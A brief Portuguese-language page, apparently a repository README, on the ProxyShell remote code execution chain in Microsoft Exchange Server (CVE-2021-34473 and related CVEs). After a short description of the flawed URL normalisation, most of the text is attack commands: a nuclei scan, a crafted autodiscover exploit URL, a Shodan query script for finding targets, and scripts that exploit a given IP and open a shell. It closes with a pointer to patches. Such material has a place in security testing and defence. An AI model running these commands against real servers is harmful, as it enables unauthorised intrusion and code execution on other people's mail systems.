
CVE-2021-34473 Vulnerabilidade de Execução Remota de Código no Microsoft Exchange Server
CVE-2021-34473 Vulnerabilidade de Execução Remota de Código no Microsoft Exchange Server. Essa normalização de URL defeituosa nos permite acessar uma URL de backend arbitrária enquanto executamos como a conta de máquina do Exchange Server. Embora este bug não seja tão poderoso quanto o SSRF do ProxyLogon, e só possamos manipular a parte do caminho da URL, ainda é poderoso o suficiente para realizarmos mais ataques com acesso arbitrário ao backend.
Scanner nuclei para Proxyshell RCE (CVE-2021-34423,CVE-2021-34473,CVE-2021-31207) descoberto por orange tsai no Pwn2Own, que afeta o Microsoft Exchange Server.
nuclei -u target.com -t proxyshell.yaml
https://xxx.xxx.xxx.xxx/autodiscover/[email protected]/mapi/nspi/?&Email=autodiscover/autodiscover.json%[email protected]
sudo python3 shodan-query.py
sudo python3 ProxyShell.py -u https://<IP>
python2 /manual/check.py
sudo python3 /manual/proxyshell.py
python2 /manual/shell.py
Aplique as atualizações de segurança encontradas aqui: CVE-2021-34473